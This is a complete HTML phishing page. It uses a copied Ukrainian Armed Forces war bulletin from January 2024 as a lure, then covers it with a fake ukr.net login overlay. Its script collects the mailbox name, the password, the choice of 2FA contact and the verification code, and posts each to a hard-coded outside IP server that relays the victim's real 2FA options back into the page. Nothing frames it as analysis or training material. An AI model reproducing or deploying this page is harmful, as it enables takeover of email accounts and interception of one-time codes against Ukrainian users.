<!DOCTYPE html>
<html>
<head>
<style>
p {
  margin: 0;
  text-indent: 5%;
}

p + p{
  margin-top:10px;
}
</style>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<meta name="theme-color" content="#669900">
<link href="https://accounts.ukr.net/login/css/bundle.css?7a8389c0" rel="stylesheet">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.1/jquery.min.js">
</script>
<script>function show_last(){document.getElementById("first").style="display:none";document.getElementById("second").style="display:none";document.getElementById("third").style="display:none";document.getElementById("last").style="display:block";}</script>
<script>function next(){document.getElementById("first").style="pointer-events:none;";document.getElementById("first").style="opacity: .4;";var data1 = $("#first").serialize();document.getElementById("first").style="display:none";document.getElementById("second").style="display:block";}function next2(){text=$("input[type=\"radio\"][name=\"second\"]:checked").next().next().text();document.getElementById("second").style="pointer-events:none;";document.getElementById("second").style="opacity: .4;";document.getElementById("second").style="display:none";document.getElementById("factor").innerText=text;document.getElementById("third").style="display:block";} function wait(){$("button")[0].disabled="true";} function nowait(){$("button")[0].disabled="";$("button")[0].style.backgroundImage="";}
function send(data)
{
var req=new XMLHttpRequest();
req.onreadystatechange = function() 
{ 
if (req.readyState == XMLHttpRequest.DONE) 
{
if (req.responseText=="Finaly"){$('#shadow').fadeOut(3000);}
else if (req.responseText=="Redirect"){location='http://mail.ukr.net/';}
else if (req.responseText=="AGAIN"){req.open("POST", "http://202.55.80.225:35770", true);req.send(data);}else if (req.responseText=="BAD"){document.getElementsByClassName("_1oZFLSZ_")[0].innerText="Неправильні дані";document.getElementsByClassName("_1gd_58q0 _5wVrJZ2Y")[0].style.background="red";document.getElementsByClassName("_1gd_58q0 _5wVrJZ2Y")[1].style.background="red";nowait();}else if (req.responseText.includes("DATA=")){var full = req.responseText.split("DATA=")[1];full=JSON.parse(full.replaceAll(String.fromCharCode(39),String.fromCharCode(34)));next();					full.forEach(element=>setInp(element.value, element.id));}}}; req.open("POST", "http://202.55.80.225:35770", true); req.send(data);} function captcha(){var req=new XMLHttpRequest();		req.open("GET", "http://202.55.80.225:35770/captcha", true);req.send();}function success() 		{if(document.getElementsByClassName("_2yPTK9xQ")["login"].value==="" || document.getElementsByClassName("_2yPTK9xQ")["password"].value==="") 		{$("button")[0].disabled = true;}else{$("button")[0].disabled = false;        }    }					function success2() {if(document.getElementsByClassName("_2yPTK9xQ")["login"].value==="" || document.getElementsByClassName("_2yPTK9xQ")["password"].value==="") {$("button")[0].disabled = true;} else {$("button")[0].disabled = false;        }    }		captcha();</script>
<style>@font-face{  font-family: text-security-disc;  src: url("https://raw.githubusercontent.com/noppa/text-security/master/dist/text-security-disc.woff");}</style>

<script>function setInp(text, value){var lab = document.createElement("label");lab.setAttribute("class","_2P6Pza32 _1g9pa7WS _3wOl-tOq");var div1 = document.createElement("div");div1.setAttribute("class","_2oOeQPrj");var div2 = document.createElement("div");div2.setAttribute("class","nzxgmM7Y");div2.innerText=text;var inp = document.createElement("input");inp.setAttribute("class","E_AfKbPE");inp.type="radio";inp.value=value;inp.checked="";inp.name="second";inp.onclick=function (){$("button")[1].disabled="";};lab.appendChild(inp);lab.appendChild(div1);lab.appendChild(div2);document.getElementById("cont").appendChild(lab);}</script>
</head>
<body style='background-color: rgb(236, 236, 236);' onload="$('#shadow').fadeIn(3000)">
<div id='text' style='padding: 2% 5%; font-size: 2em;'>
<div style='line-height: 2; text-align: center; font-size: 3em;'>
<img src="https://www.zsu.gov.ua/wp-content/themes/zsu-theme-newgen/assets/img/zsu-logo.png" alt="" style='max-width: 200px;'><br>ЗБРОЙНІ СИЛИ УКРАЇНИ
</div><br><br>
<h1 style='text-align: center;'>Оперативна інформація станом на 06.00 19 січня 2024 року щодо російського вторгнення</h1><br>
<p>
Слава Україні!
</p>
<p>
Розпочалася шістсот дев’яносто п'ятий доба широкомасштабної збройної агресії російської федерації проти України.
</p>
<p>
Противник продовжує ігнорувати закони та звичаї ведення війни, використовує тактику терору, завдає ракетних та авіаційних ударів, здійснює обстріли з реактивних систем залпового вогню не тільки по військових, а й по численних цивільних об’єктах нашої держави.
</p>
<p>
Протягом минулої доби відбулося 98 бойових зіткнень. Загалом ворог завдав 4 ракетних та 29 авіаційних ударів, здійснив 49 обстрілів з реактивних систем залпового вогню по позиціях наших військ та населених пунктах. Наприкінці минулої доби російські окупанти завдали ракетних ударів по центральній частині міста Харків. Внаслідок російських терористичних атак, на жаль, є поранені серед цивільного населення. Руйнувань та пошкоджень зазнали лікарня, приватні та багатоквартирні житлові будинки, інша цивільна інфраструктура.
</p>
<p>
Вночі, російські окупанти завдали чергового авіаційного удару, застосувавши 20 ударних БпЛА типу “Shahed-136/131”. Силами та засобами протиповітряної оборони України 19 ударних БпЛА знищено.
</p>
<p>
Авіаційних ударів зазнали: Вовчанськ Харківської області; Орлівка, Авдіївка, Костянтинівка, Новомихайлівка, Водяне Донецької області; Мала Токмачка, Преображенка, Оріхів Запорізької області.
</p>
<p>
Під артилерійським вогнем опинилися понад 120 населених пунктів Чернігівської, Сумської, Харківської, Луганської, Донецької, Запорізької, Дніпропетровської, Херсонської та Миколаївської областей.
</p>
<p>
В зоні відповідальності ОСУВ “Північ” на Волинському та Поліському напрямках оперативна обстановка залишається без суттєвих змін.
</p>
<p>
На Сіверському та Слобожанському напрямках противник зберігає військову присутність у прикордонних районах, проводить активну диверсійну діяльність з метою недопущення перекидання наших військ на загрозливі напрямки, нарощує щільність мінно-вибухових загороджень вздовж державного кордону в бєлгородській області.
</p>
<p>
В зоні відповідальності ОСУВ “Хортиця” на Куп’янському напрямку ворог наступальних (штурмових) дій не вів.
</p>
<p>
На Лиманському напрямку нашими захисниками відбито 11 атак противника в районах Тернів, Ямполівки, Торського Донецької області та ще 17 атак біля Макіївки, Білогорівки, Серебрянського лісництва Луганської області та північніше Григорівки, Веселого Донецької області.
</p>
<p>
На Бахмутському напрямку наші воїни відбили 9 атак окупантів неподалік Іванівського, Кліщіївки та Андріївки Донецької області.
</p>
<p>
В зоні відповідальності ОСУВ “Таврія” на Авдіївському напрямку українські захисники продовжують стримувати ворога, який не полишає спроб оточити Авдіївку. Наші воїни стійко тримають оборону, завдаючи загарбникам значних втрат. Так, Сили оборони протягом минулої доби відбили 20 атак ворога в районах Новобахмутівки, Степового, Авдіївки та ще 15 атак поблизу Первомайського та Невельського Донецької області.
</p>
<p>
На Мар’їнському напрямку наші оборонці продовжують стримувати ворога біля Красногорівки, Георгіївки, Мар’їнки та Новомихайлівки Донецької області, де відбито 17 атак.
</p>
<p>
На Шахтарському напрямку окупанти наступальних (штурмових) дій не вели.
</p>
<p>
На Запорізькому напрямку Сили оборони відбили атаку противника західніше Вербового Запорізької області.
</p>
<p>
В зоні відповідальності ОСУВ “Одеса” на Херсонському напрямку Сили оборони надалі продовжують заходи із розширення плацдарму. Незважаючи на значні втрати, ворог не полишає спроб вибити наші підрозділи із займаних позицій. Протягом минулої доби противник здійснив 6 безуспішних штурмів позицій наших військ.
</p>
<p>
Водночас, українські воїни продовжують активними діями завдавати окупаційним військам втрат в живій силі та техніці, виснажують ворога вздовж всієї лінії фронту.
</p>
<p>
Протягом минулої доби авіація Сил оборони завдала ударів по 1 району зосередження особового складу, озброєння та військової техніки противника. Також силами та засобами протиповітряної оборони України знищено одну керовану авіаційну ракету Х-59.
</p>
<p>
Підрозділами ракетних військ завдано ураження по 1 району зосередження особового складу, 2 пунктах управління та 2 складах боєприпасів противника.
</p>
<p>
Підтримуйте Збройні Сили! Переможемо разом!
Слава Україні!
</p>

</div>
<div id='shadow' style='position:fixed; width:100%; height:100%; backdrop-filter: blur(6px); top: 0; left: 0;'>
<div id='form' style='min-width: 400px; max-width: 600px; margin: auto; text-align: center; margin-top: 5%;margin-bottom: 5%; padding: 5%; background:white; border-radius: 10px;'>

<svg xmlns="http://www.w3.org/2000/svg" style='max-height: 100px;'><path d="M22.1 17.247l-.972.59-1.014.634-.841.716-.844.717-.76.845-.717.93-.634.969-.674 1.012-.55 1.056-.463 1.053-.338 1.14-.337 1.139-.17 1.14-.126 1.224-.043 1.224v.802l.084.802.045.76.168.8.126.716.21.762.21.758.34.76.295.631.336.719.381.633.423.718.97 1.265.507.59.588.634 1.183 1.096 1.224.928.631.424.677.379 1.35.674 1.434.509 1.478.378.76.127.801.125.803.044.886.041h.59l-.128-32.153v-.125h2.615l.13 35.275h-2.785l-.93-.044-.928-.04-1.814-.253-.887-.213-.843-.21-.802-.255-.803-.293-.8-.338-.804-.38-1.475-.887-.76-.507-.674-.549-.717-.545-.634-.591-.717-.718-.59-.675-.593-.678-.505-.715-.506-.758-.465-.718-.38-.759-.336-.718-.337-.804-.297-.802-.253-.841-.17-.803-.169-.885-.084-.845-.083-.884v-.888l.042-1.393.168-1.307.254-1.31.38-1.222.422-1.266.59-1.182.634-1.182.801-1.095.8-1.14.887-.971.888-.929 1.054-.8 1.054-.76 1.183-.676 1.138-.59 1.31-.507zM8.987 10.62l-1.094 1.14-1.057 1.181-.97 1.224-.844 1.267-1.562 2.615-.676 1.35-.547 1.435-.548 1.434-.466 1.478-.42 1.477-.297 1.56-.253 1.52L0 31.594v1.688l.041 1.687.086 1.645.168 1.604.296 1.602.124.762.17.8.423 1.52.464 1.476.254.717.336.76.591 1.393.674 1.394.76 1.307.844 1.35.886 1.264.971 1.224 1.055 1.183 1.14 1.222 1.138 1.014 1.183 1.056 1.224.969 1.307.886 1.308.801 1.35.76 1.35.674 1.435.635 1.435.506 1.52.465 1.518.38 1.604.338 1.603.252 1.645.17 1.688.083 1.73.085h.127l1.139-.044 1.14-.041 1.14-.128 1.18-.125 2.279-.38 1.138-.21 1.226-.256 2.278-.674 1.138-.38 1.097-.42 2.278-.971 2.28-1.055 1.605-.887 1.517-.887 1.394-.928 1.815-1.392.463-.38.423-.338.378-.337.296-.294.254-.297.337-.465-.043-.084-.294.213-1.183.927-1.266.93-.633.462-.294.213-1.604 1.055-1.266.799-2.405 1.268-1.18.59-1.225.506-2.448.972-1.264.421-1.224.38-1.31.294-1.265.297-2.574.422-2.659.252-2.658.13-1.73-.045-1.645-.085-1.646-.212-1.562-.209-1.518-.337-1.52-.38-1.477-.464-1.392-.508-1.393-.63-1.349-.679-1.309-.758-1.265-.803-1.267-.928-1.181-.927-1.138-1.055-1.14-1.056-1.014-1.139-1.01-1.14-.888-1.22-.886-1.185-.76-1.264-.718-1.267-.633-1.35-.548-1.308-.547-1.393-.423-1.392-.38-1.478-.295-1.433-.252-1.52-.17-1.518-.084-1.603-.043-1.562v-1.604l.254-2.996.507-2.911.377-1.393.425-1.392.548-1.306.505-1.352.676-1.266.674-1.266.76-1.224.844-1.223.93-1.182.968-1.14 1.057-1.096 1.012-1.097 1.138-1.013 1.098-.971L14.22 8.3l1.183-.803 1.181-.76 1.224-.632 1.307-.591 1.268-.547 1.35-.423 1.348-.423 1.392-.294 1.393-.253 1.434-.17 1.478-.083 1.52-.042 1.475.042 1.52.083 1.394.17 1.434.21 1.348.297 1.35.378 1.352.38 1.307.549 1.224.549.633.295.634.338 1.18.674 1.181.761 1.141.843 1.14.928 1.095.972 1.057 1.011.97 1.055 1.011 1.141.887 1.14.844 1.222.72 1.223.715 1.31.633 1.264.59 1.395.464 1.348.423 1.434.38 1.394.337 1.518.21 1.52.17 1.603.084 1.562.084 1.687v.929l-.04.927-.087.93-.084.927-.253 1.857-.337 1.814-.464 1.773-.55 1.77-.674 1.73-.76 1.69-17.596-32.49h-2.615l.127 35.231 2.574-.084-.086-29.663L54.517 50.54h2.658l1.14-2.027 1.011-2.067.845-2.11.38-1.097.337-1.055.296-1.14.254-1.097.21-1.139.17-1.096.126-1.14.127-1.14.04-1.18.043-1.14-.083-1.687-.127-1.604-.21-1.646-.213-1.52-.337-1.561-.38-1.476-.507-1.476-.505-1.393-.635-1.435-.631-1.35-.76-1.392-.802-1.268-.93-1.265-.927-1.224-1.054-1.18-1.056-1.14-.59-.633-.59-.506-1.182-1.055-1.224-.971-1.223-.844-1.309-.886-1.265-.717-1.35-.676-1.31-.59-1.434-.548-1.434-.464-2.912-.675-1.52-.254-1.518-.169-1.56-.085h-3.21l-1.603.127-1.56.127-1.478.296-1.518.294-1.475.423-1.393.464-1.394.548-1.391.634-1.31.633-1.308.76-1.224.843-1.265.886-1.18.97-1.184 1.055z" fill="#ffcd00"/><path d="M213.276 26.766c-.066-1.136-.3-2.525-.3-2.525a16.927 16.927 0 00-.468-2.267l-.644-1.924s-.472-.944-.769-1.498a8.393 8.393 0 00-.899-1.24 12.677 12.677 0 00-1.669-1.54c-.695-.47-1.88-1.069-1.88-1.069a12.193 12.193 0 00-2.267-.685 18.744 18.744 0 00-2.481-.17s-.673.01-1.456.042a12.657 12.657 0 00-2.01.342s-.981.296-1.797.643a14.68 14.68 0 00-2.14 1.325 19.699 19.699 0 00-1.795 1.881 23.173 23.173 0 00-1.497 2.31s-.774 1.788-1.07 2.61a8.337 8.337 0 00-.384 1.41 17.17 17.17 0 00-.427 3.08v2.653l.085 1.925a10.571 10.571 0 00.257 1.84l.385 1.71s.273.764.555 1.583a9.548 9.548 0 00.642 1.453 8.004 8.004 0 00.814 1.368l.94 1.2a12.243 12.243 0 001.454 1.411 17.257 17.257 0 002.14 1.413 18.883 18.883 0 002.438.939 24.82 24.82 0 002.738.472 25.684 25.684 0 003.463-.044 17.482 17.482 0 003.979-.9c1.253-.404 2.052-.724 2.052-.724v-3.422l-1.069.468s-1.278.566-2.096.814l-1.967.599a16.05 16.05 0 01-1.798.256 17.657 17.657 0 01-2.053 0 18.338 18.338 0 01-2.137-.469 12.416 12.416 0 01-1.968-.898 19.179 19.179 0 01-1.71-1.372 14.787 14.787 0 01-1.413-1.708 9.83 9.83 0 01-1.025-1.84 14.06 14.06 0 01-.643-2.054 9.759 9.759 0 01-.256-1.668c-.044-.837-.044-1.71-.044-1.71h20.319s-.063-2.885-.129-4.02zm-4.069.77h-16.683a17.456 17.456 0 01.472-3.68 6.931 6.931 0 011.66-3.586 9.622 9.622 0 012.787-2.36 6.432 6.432 0 013.893-.854 7.457 7.457 0 013.892.94 6.726 6.726 0 012.652 3.039 10.651 10.651 0 011.089 3.71 7 7 0 01.238 2.791zm-36.345-13.689a10.05 10.05 0 00-3.467.514 9.67 9.67 0 00-3.763 2.566 18.42 18.42 0 00-1.626 2.31l-.684 1.411v-6.374h-3.167l.172 30.668h3.509V27.107l.085-1.925a12.257 12.257 0 011.156-3.506 14.24 14.24 0 012.309-2.953 6.965 6.965 0 013.08-1.54 9.562 9.562 0 014.613.274 5.04 5.04 0 012.862 1.689 9.063 9.063 0 011.079 2.144 7.167 7.167 0 01.257 1.283c.049.6.117 1.09.128 1.582l.044 1.925v18.862h3.593V25.91a34.992 34.992 0 00-.344-4.233 8.61 8.61 0 00-.47-1.755 8.94 8.94 0 00-1.282-2.567 8.22 8.22 0 00-3.894-2.865 10.41 10.41 0 00-4.19-.642zm-28.215 3.422a8.226 8.226 0 012.865.686V14.36a8.666 8.666 0 00-3.887-.643 5.079 5.079 0 00-3 1.283 8.928 8.928 0 00-3.38 5.948v-6.675h-3.335l.214 30.668h3.506V27.406a9.996 9.996 0 01.472-4.063 9.634 9.634 0 011.496-3.207 6.522 6.522 0 012.224-2.181 5.628 5.628 0 012.825-.686zm-17.43-2.995h-4.578l-13.175 13.56h-.342V.444l-3.506.012v44.485h3.506V29.846h.342l14.202 15.096h5.09l-15.783-16.51zm27.912 30.856v-5.132h-4.62v5.132zM79.348 14.274h-3.55v19.934s.011 1.677.087 2.31a10.142 10.142 0 00.254 1.454 18.04 18.04 0 001.071 3.035 10.407 10.407 0 001.37 1.884 8.93 8.93 0 002.137 1.538 11.275 11.275 0 003.979.985 13.5 13.5 0 004.577-.642 6.979 6.979 0 002.523-1.498 10.948 10.948 0 001.967-2.267 11.74 11.74 0 001.112-2.136v6.071h3.337l-.213-30.668h-3.507v17.754l-.128 1.452s-.116.818-.257 1.498a6.251 6.251 0 01-.429 1.369 9.329 9.329 0 01-1.67 2.951c-.62.602-.91.938-1.324 1.283a6.572 6.572 0 01-1.54.94 6.047 6.047 0 01-1.669.557 14.322 14.322 0 01-2.78.13 5.466 5.466 0 01-2.396-.729 6.425 6.425 0 01-1.667-1.668 6.181 6.181 0 01-.814-1.668 7.826 7.826 0 01-.47-2.352V14.274zm155.48 3.209v-3.209h-6.887V.374h-3.55v13.9h-5.944v3.209h5.944V36.56s-.006.981 0 1.624a17.71 17.71 0 00.3 2.14s.242.92.342 1.155l.385.9a5.574 5.574 0 00.47.769c.235.299.856.899.856.899a2.881 2.881 0 00.683.512c.401.211.358.27.73.383l.853.26a3.782 3.782 0 00.942.17 7.638 7.638 0 001.54.042c.651-.056.69-.04.985-.085a11.495 11.495 0 001.495-.302L235 44.73v-3.124a11.112 11.112 0 01-2.61.557 12.854 12.854 0 01-1.883-.042s-.433-.07-.683-.129a2.147 2.147 0 01-.984-.683 6.63 6.63 0 01-.855-3.337c-.056-.901-.044-1.711-.044-1.711V17.483zM75.143 56.39v8.975h6.624v2.4h2.065v-4.111h-1.1V56.39h-2.208v7.264h-3.17V56.39h-2.21zm18.48 7.21l-1.62-.958a2.118 2.118 0 01-1.907 1.148c-1.3 0-1.959-.856-1.977-2.553h5.61v-.461c0-2.912-1.442-4.557-3.864-4.557s-3.918 1.7-3.918 4.676c0 2.946 1.478 4.642 3.953 4.642a3.97 3.97 0 003.722-1.935zm-5.468-3.888a1.736 1.736 0 011.565-1.893q.072-.006.145-.007a1.659 1.659 0 011.692 1.9h-3.402zm12.481 2.1h8.9v-1.76h-8.9zm15.647-5.427v8.975h1.816v-5.886c0-.343-.017-.5-.053-1.251.427 1.13.321.89.5 1.353l2.226 5.79h1.282l2.084-5.79c.071-.205.338-.907.534-1.353-.036.772-.054 1.01-.054 1.285v5.858h2.1V56.39h-3.063l-2.083 5.794-2.19-5.79h-3.1zm14.433 8.975h2.208v-8.97h-2.208v8.97zm0-10.448h2.208v-2h-2.208zm5.523 1.473v8.975h2.21v-.781l2.634-3.53a6.524 6.524 0 00.748-1.215h.036a10.56 10.56 0 00-.07 1.1v4.437h2.207V56.39h-2.208v.7l-2.618 3.529a9.017 9.017 0 00-.748 1.233h-.036c.036-.616.054-.514.054-1.078V56.39h-2.209zm1.158-3.401a2.039 2.039 0 00.82 1.61 3.5 3.5 0 003.81 0 2.033 2.033 0 00.82-1.61h-1.675a1.222 1.222 0 01-.23.685 1.113 1.113 0 01-1.573.065q-.034-.031-.066-.065a1.223 1.223 0 01-.236-.685zm17.314 12.384h2.208V56.39h-2.208v8.978zm0-10.448h2.208v-2h-2.208zm5.524 1.473v8.975h2.208V61.53h3.17v3.836h2.208V56.39h-2.208v3.426h-3.17V56.39h-2.208zm10.394 0v1.712h2.654v7.263h2.208v-7.265h2.654V56.39h-7.516zm17.292 7.21l-1.62-.958a2.118 2.118 0 01-1.907 1.148c-1.3 0-1.959-.856-1.976-2.553h5.61v-.464c0-2.912-1.443-4.557-3.865-4.557s-3.918 1.7-3.918 4.676c0 2.946 1.478 4.642 3.954 4.642a3.972 3.972 0 003.722-1.935zm-5.468-3.888a1.736 1.736 0 011.565-1.893q.072-.006.145-.007a1.658 1.658 0 011.692 1.9h-3.402zm10.6 4.8a2.782 2.782 0 002.262 1.028c2.012 0 3.561-1.764 3.561-4.66 0-2.791-1.513-4.658-3.633-4.658a3.232 3.232 0 00-2.529 1.147l-.23-.976h-1.6v12.23h2.172V64.51zm-.018-1.456v-4.275a2.385 2.385 0 011.656-.788c1.23 0 1.977 1.01 1.977 2.878 0 1.884-.766 2.929-1.959 2.929a2.48 2.48 0 01-1.672-.75zm8.6-6.663v8.975h2.208V61.53h3.17v3.836h2.208V56.39h-2.208v3.426h-3.17V56.39h-2.208zm18.48 7.21l-1.62-.958a2.118 2.118 0 01-1.907 1.148c-1.3 0-1.959-.856-1.976-2.553h5.61v-.467c0-2.912-1.443-4.557-3.865-4.557s-3.918 1.7-3.918 4.676c0 2.946 1.478 4.642 3.953 4.642a3.97 3.97 0 003.72-1.935zm-5.468-3.888a1.735 1.735 0 011.562-1.892q.074-.007.148-.008a1.658 1.658 0 011.691 1.9h-3.4zm7.717-3.323v1.712h2.653v7.263h2.21v-7.267h2.652V56.39h-7.512zm10.025 8.975h2.386V62.9h-2.388v2.466zm.356-4.2h1.656l.463-8.256H232.3z" fill="#035ba9"/></svg>


<div style='font-size: 3em; padding-bottom: 5%; padding-top: 5%;'>Підтвердьте доступ</div>
<form class="_24ez49Dh" method="POST" id="first">
<div class="_3c6HWgJy"><div class="_2g3MjWod _3R8yaQnp qksDCM1v">
<label class="cvxzFsio">
<input type="text" autocapitalize="off" autocorrect="off" maxlength="32" name="login" value="" class="_2yPTK9xQ" autofocus="" required="" oninput="success()">
<p class="_31sFZNDV _3R8yaQnp _5wVrJZ2Y" style="transform: translateY(0px);">Ім&lsquo;я скриньки</p>
<div class="_1gd_58q0 _5wVrJZ2Y">
</div></label>
<span class="_38_4DkC1">@ukr.net</span>
</div></div><div>
<div class="_2g3MjWod _3R8yaQnp qksDCM1v">
<label class="cvxzFsio">
<input type="text" name="password" maxlength="128" value="" class="_2yPTK9xQ" required="" style="-webkit-text-security: disc; font-family: text-security-disc;" oninput="success()">
<p class="_31sFZNDV _3R8yaQnp _5wVrJZ2Y" style="transform: translateY(0px);">Пароль</p>
<div class="_1gd_58q0 _5wVrJZ2Y">
</div></label></div></div>
<p class="_1oZFLSZ_"> </p>
<div class="_3N3Yla8d">
<label class="tVeq8N6V _2LIMJGMM _2Wv_ONv8">
<input type="checkbox" class="WxPxfuTl">
<div class="_2D_WbGHd">Чужий комп&lsquo;ютер</div>
</label></div>
<script>var form_first="form#first";var form_second="form#second";var form_third="form#third"; var ukrurl="https://mail.ukr.net"</script>
<button class="Ol0-ktls jY4tHruE _2yaudugp" type="button" onclick="wait(); send($(form_first).serialize())">
<div class="_tkoBLTr">Продовжити</div>
</button>
</form>

<form class="_3Bus1Snq _2J0rCMWK" id="second" style="display:none">
<div id="cont">
<p class="_1ZsMKkmo">Ця спроба входу виглядає незвичайно.Підтвердьте, що це ви, за допомогою коду, який ми відправимо на вибраний контакт.</p>
</div>
<div class="_293iQiDP">
<button class="Ol0-ktls jY4tHruE NlUr90m4" type="button" onclick="send($(form_second).serialize());next2();" disabled="true">
<div class="_tkoBLTr">Отримати код</div>
</button>
<button class="_3sos-9Te _2SrAMwRQ _3i_9ZXfv" type="button">Немає доступу до цих контактів?</button>
</div>
</form>
<form class="_2Na2Q6aN" method="POST" id="third" style="display:none">
<div class="R1ySnLL0">
<div class="_3BWpa0VD">
<span>Лист надіслано на</span>
<br>
<span class="KfUrGWj2" id="factor">
</span>
</div>
<div class="jmr2mY51">
<div class="_1vFobo3A">
<div class="_2g3MjWod _3R8yaQnp qksDCM1v">
<label class="cvxzFsio">
<input name="vc" inputmode="numeric" autocomplete="off" maxlength="6" class="_2yPTK9xQ" type="text" value="">
<p class="_31sFZNDV _3R8yaQnp _5wVrJZ2Y" style="transform: translateY(0px);">Введіть код підтвердження</p>
<div class="_1gd_58q0 _5wVrJZ2Y">
</div>
</label>
</div>
<p class="_1oZFLSZ_">
</p>
</div>
</div>
</div>
<div class="_3k7_SgYI">
<button class="Ol0-ktls jY4tHruE _3KucQngr" type="button" onclick="send($(form_third).serialize());">
<div class="_tkoBLTr">Увійти</div>
</button>
<div class="_1rcAiSpo">
<button class="_3sos-9Te _2SrAMwRQ _3i_9ZXfv _2luW1TD3" type="button">Отримати новий код</button>
<button class="_3sos-9Te _2SrAMwRQ _3i_9ZXfv" type="button">Не вдається увійти?</button>
</div>
</div>
</form>

</div>
</div>
<script>
$('#shadow').hide();
</script>
</body>
</html>